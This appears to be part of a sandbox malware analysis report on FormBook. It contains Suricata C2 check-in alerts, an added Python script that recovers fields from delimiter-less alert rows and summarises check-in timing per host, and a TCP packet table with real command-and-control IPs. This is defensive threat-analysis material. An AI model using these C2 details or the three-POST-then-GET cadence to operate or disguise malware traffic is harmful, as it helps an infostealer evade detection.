2024-11-17T08:37:28.797666+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:31.349528+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:33.867748+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50032 | 67.223.117.169 | 80 | TCP
2024-11-17T08:37:39.569655+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:42.107536+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:44.661726+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:48.046200+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:54.657728+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:56.327332+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | TCP
2024-11-17T08:37:59.057631+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:01.586729+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50040 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:08.139589+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:09.809608+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50042 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:12.368620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50043 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:14.915984+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | TCP
2024-11-17T08:38:21.128979+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:23.500997+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:26.047633+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50047 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:28.976984+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50048 | 172.217.18.19 | 80 | TCP
2024-11-17T08:38:34.901319+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 13.248.169.48 | 80 | TCP
                                                                                2024-11-17T08:38:37.549598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005013.248.169.4880TCP
                                                                                2024-11-17T08:38:40.010481+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005113.248.169.4880TCP
                                                                                2024-11-17T08:38:42.698493+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45005213.248.169.4880TCP
                                                                                2024-11-17T08:38:49.249571+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500533.33.130.19080TCP
                                                                                2024-11-17T08:38:50.909685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500543.33.130.19080TCP
                                                                                2024-11-17T08:38:53.573643+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500553.33.130.19080TCP
                                                                                2024-11-17T08:38:58.943682+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500563.33.130.19080TCP
                                                                                2024-11-17T08:39:05.537341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500573.33.130.19080TCP
                                                                                2024-11-17T08:39:07.190058+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500583.33.130.19080TCP
                                                                                2024-11-17T08:39:10.044833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500593.33.130.19080TCP
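The alert rows in the text export of this report have lost their column delimiters, and splitting a tail such as 5002898.124.224.1780 back into source port, destination IP and destination port is not unique: 98.124.224.17:80 and 98.124.224.1:780 are both syntactically valid. The Python below is an added example, not code from Joe Sandbox or from the report; it recovers the fields by enumerating every valid split and then applying two priors this report supports (the analysis host is 192.168.2.4 and the check-ins go to port 80) plus one general one (Windows allocates client ports from the 49152-65535 dynamic range), refusing to guess when a row is still ambiguous. It then groups the recovered alerts per C2 host to expose the three-POST-then-GET cadence and the host rotation visible in the table. The sample rows are copied from the table above; the function names and the parameter names for the priors are my own.

```python
"""Recover fields from flattened Joe Sandbox Suricata alert rows and summarise
FormBook C2 check-ins per host. Added example, not part of the report."""
import re
from datetime import datetime
from functools import lru_cache

# Rows as they appear in the report once the table delimiters are lost: timestamp,
# SID, signature, severity, src IP, src port, dst IP, dst port and protocol run
# together. A subset of the table above is enough to show the check-in pattern.
FLATTENED_ROWS = [
    "2024-11-17T08:37:20.466700+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002898.124.224.1780TCP",
    "2024-11-17T08:37:26.242161+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002967.223.117.16980TCP",
    "2024-11-17T08:37:28.797666+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003067.223.117.16980TCP",
    "2024-11-17T08:37:31.349528+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003167.223.117.16980TCP",
    "2024-11-17T08:37:33.867748+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003267.223.117.16980TCP",
    "2024-11-17T08:37:39.569655+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500333.33.130.19080TCP",
    "2024-11-17T08:37:42.107536+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500343.33.130.19080TCP",
    "2024-11-17T08:37:44.661726+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500353.33.130.19080TCP",
    "2024-11-17T08:37:48.046200+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500363.33.130.19080TCP",
]


@lru_cache(maxsize=None)
def _row_re(analysis_ip):
    # The sandbox host IP is the only reliable boundary between the severity digit
    # and the port/IP tail, so the caller supplies it (assumption: a single host).
    return re.compile(
        r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d{6}[+-]\d{4})"
        r"(?P<sid>\d+)"          # Suricata signature ID
        r"(?P<sig>\D.*?)"        # signature text, starts with a letter (ET/ETPRO)
        r"(?P<sev>[1-4])"        # Suricata priority
        + re.escape(analysis_ip)
        + r"(?P<rest>[\d.]+?)"   # src port + dst IP + dst port, no delimiters
        r"(?P<proto>TCP|UDP)$"
    )


def _valid_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and not (len(p) > 1 and p[0] == "0") and int(p) <= 255 for p in parts
    )


def _valid_port(s, lo=1, hi=65535):
    return s.isdigit() and not (len(s) > 1 and s[0] == "0") and lo <= int(s) <= hi


def _split_tail(rest, ephemeral, dst_ports):
    """Every (src_port, dst_ip, dst_port) split of `rest` that survives the priors."""
    lo, hi = ephemeral
    found = []
    for p in range(1, 6):                # src port: 1..5 digits
        for q in range(1, 6):            # dst port: 1..5 digits
            if p + q + 7 > len(rest):    # shortest IPv4 literal is 7 characters
                continue
            sp, ip, dp = rest[:p], rest[p:len(rest) - q], rest[len(rest) - q:]
            if not (_valid_port(sp, lo, hi) and _valid_ip(ip) and _valid_port(dp)):
                continue
            if dst_ports is not None and int(dp) not in dst_ports:
                continue
            found.append((int(sp), ip, int(dp)))
    return found


def parse_alert(row, analysis_ip, ephemeral=(49152, 65535), dst_ports=None):
    """Parse one flattened row; raise ValueError if the tail is still ambiguous."""
    m = _row_re(analysis_ip).match(row)
    if not m:
        raise ValueError(f"not a flattened alert row: {row!r}")
    cands = _split_tail(m["rest"], ephemeral, dst_ports)
    if len(cands) != 1:
        raise ValueError(f"ambiguous tail {m['rest']!r}: candidates {cands}")
    src_port, dst_ip, dst_port = cands[0]
    method = re.search(r"\((GET|POST)\)", m["sig"])
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z"),
        "sid": int(m["sid"]), "signature": m["sig"], "severity": int(m["sev"]),
        "src_ip": analysis_ip, "src_port": src_port,
        "dst_ip": dst_ip, "dst_port": dst_port, "proto": m["proto"],
        "method": method.group(1) if method else None,
    }


def checkin_summary(alerts):
    """Per C2 host: request methods in time order, client ports and mean gap."""
    by_host = {}
    for a in sorted(alerts, key=lambda a: a["ts"]):
        by_host.setdefault(a["dst_ip"], []).append(a)
    out = {}
    for host, rows in by_host.items():
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rows, rows[1:])]
        out[host] = {
            "methods": [r["method"] for r in rows],
            "src_ports": [r["src_port"] for r in rows],
            "mean_gap_s": sum(gaps) / len(gaps) if gaps else None,
        }
    return out


if __name__ == "__main__":
    parsed = [parse_alert(r, "192.168.2.4", dst_ports={80}) for r in FLATTENED_ROWS]
    for host, info in checkin_summary(parsed).items():
        print(host, info["methods"], info["src_ports"], info["mean_gap_s"])
```

Without the destination-port prior the first row raises, because 98.124.224.17:80 and 98.124.224.1:780 both pass validation; the ephemeral-port prior is what separates 50033 to 3.33.130.190 from 5003 to 33.33.130.190 in the later rows. The per-host summary shows each host receiving three POST check-ins about 2.5 seconds apart followed by one GET before the sample moves to the next host, with client ports increasing by one per request.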
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 08:35:53.837115049 CET | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:35:53.842092991 CET | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:35:53.842189074 CET | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:35:53.848566055 CET | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:35:53.853501081 CET | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:35:54.802305937 CET | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:35:54.803368092 CET | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:35:54.803468943 CET | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:35:54.805150986 CET | 49742 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:35:54.810137987 CET | 80 | 49742 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:36:09.952707052 CET | 49792 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:09.957842112 CET | 80 | 49792 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:09.958003044 CET | 49792 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:09.973157883 CET | 49792 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:09.978049994 CET | 80 | 49792 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:10.638700962 CET | 80 | 49792 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:10.681308985 CET | 80 | 49792 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:10.681399107 CET | 49792 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:11.483294964 CET | 49792 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:12.501224995 CET | 49807 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:12.506553888 CET | 80 | 49807 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:12.506653070 CET | 49807 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:12.521907091 CET | 49807 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:12.527163982 CET | 80 | 49807 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:13.200416088 CET | 80 | 49807 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:13.243463993 CET | 80 | 49807 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:13.243547916 CET | 49807 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:14.030229092 CET | 49807 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:15.049995899 CET | 49822 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:15.055428028 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.055802107 CET | 49822 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:15.063832998 CET | 49822 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:15.068909883 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069051027 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069065094 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069096088 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069108009 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069189072 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069202900 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069228888 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.069242001 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.743299961 CET | 80 | 49822 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:15.795679092 CET | 49822 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:16.577074051 CET | 49822 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:17.594901085 CET | 49838 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:17.721884012 CET | 80 | 49838 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:17.721987963 CET | 49838 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:17.727854967 CET | 49838 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:17.732702971 CET | 80 | 49838 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:18.409260035 CET | 80 | 49838 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:18.450855970 CET | 80 | 49838 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:18.451019049 CET | 49838 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:18.451697111 CET | 49838 | 80 | 192.168.2.4 | 64.225.91.73
Nov 17, 2024 08:36:18.456824064 CET | 80 | 49838 | 64.225.91.73 | 192.168.2.4
Nov 17, 2024 08:36:23.495130062 CET | 49869 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:23.500174999 CET | 80 | 49869 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:23.500272036 CET | 49869 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:23.509216070 CET | 49869 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:23.514240980 CET | 80 | 49869 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:24.217346907 CET | 80 | 49869 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:24.257040977 CET | 80 | 49869 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:24.257087946 CET | 49869 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:25.014456034 CET | 49869 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:26.032732010 CET | 49884 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:26.037678003 CET | 80 | 49884 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:26.037765980 CET | 49884 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:26.046874046 CET | 49884 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:26.051832914 CET | 80 | 49884 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:26.715523958 CET | 80 | 49884 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:26.754391909 CET | 80 | 49884 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:26.754764080 CET | 49884 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:27.561366081 CET | 49884 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:28.580178022 CET | 49900 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:28.585067987 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.585134029 CET | 49900 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:28.596765041 CET | 49900 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:28.601700068 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.601764917 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.601797104 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.601898909 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.601927042 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.602025032 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.602082968 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.602109909 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:28.602139950 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:29.281151056 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:29.320647955 CET | 80 | 49900 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:29.320780039 CET | 49900 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:30.108290911 CET | 49900 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:31.126331091 CET | 49915 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:31.131309032 CET | 80 | 49915 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:31.131412029 CET | 49915 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:31.137388945 CET | 49915 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:31.142364979 CET | 80 | 49915 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:31.825643063 CET | 80 | 49915 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:31.864131927 CET | 80 | 49915 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:31.864264011 CET | 49915 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:31.864993095 CET | 49915 | 80 | 192.168.2.4 | 209.74.64.187
Nov 17, 2024 08:36:31.870166063 CET | 80 | 49915 | 209.74.64.187 | 192.168.2.4
Nov 17, 2024 08:36:44.994007111 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:44.999104023 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:44.999195099 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:45.010999918 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:45.015986919 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.687773943 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.687886000 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.687921047 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.687951088 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:45.687953949 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.687988043 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.688007116 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:45.727392912 CET | 80 | 49989 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:45.727731943 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:46.515372992 CET | 49989 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:47.532531023 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:47.537848949 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:47.541757107 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:47.550487041 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:47.555705070 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.233987093 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.234033108 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.234069109 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.234081984 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:48.234102964 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.234141111 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.234150887 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:48.272557974 CET | 80 | 50001 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:48.272600889 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:49.110711098 CET | 50001 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.126698017 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.131544113 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.131613016 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.142884970 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.142910004 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.147829056 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.147842884 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.147895098 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.147936106 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.147969961 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.147981882 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.148010969 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.148022890 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.148036003 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.826848030 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.826879978 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.826895952 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.826911926 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.826927900 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.826946020 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.827215910 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:50.865089893 CET | 80 | 50017 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:50.865159988 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:51.655114889 CET | 50017 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:52.673703909 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:52.679807901 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:52.685672998 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:52.689620972 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:52.694999933 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370141983 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370170116 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370187044 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370203018 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370219946 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370235920 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370250940 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370265961 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370527983 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:53.370527983 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:53.370553017 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.370579958 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.371637106 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:53.409190893 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:53.409506083 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:53.413373947 CET | 50020 | 80 | 192.168.2.4 | 162.0.215.33
Nov 17, 2024 08:36:53.418250084 CET | 80 | 50020 | 162.0.215.33 | 192.168.2.4
Nov 17, 2024 08:36:58.442687988 CET | 50021 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:36:58.447676897 CET | 80 | 50021 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:36:58.447751999 CET | 50021 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:36:58.460618973 CET | 50021 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:36:58.465677977 CET | 80 | 50021 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:36:59.083533049 CET | 80 | 50021 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:36:59.083626986 CET | 50021 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:36:59.967626095 CET | 50021 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:36:59.972623110 CET | 80 | 50021 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:00.989520073 CET | 50022 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:00.994656086 CET | 80 | 50022 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:00.997817993 CET | 50022 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:01.009502888 CET | 50022 | 80 | 192.168.2.4 | 3.33.130.190
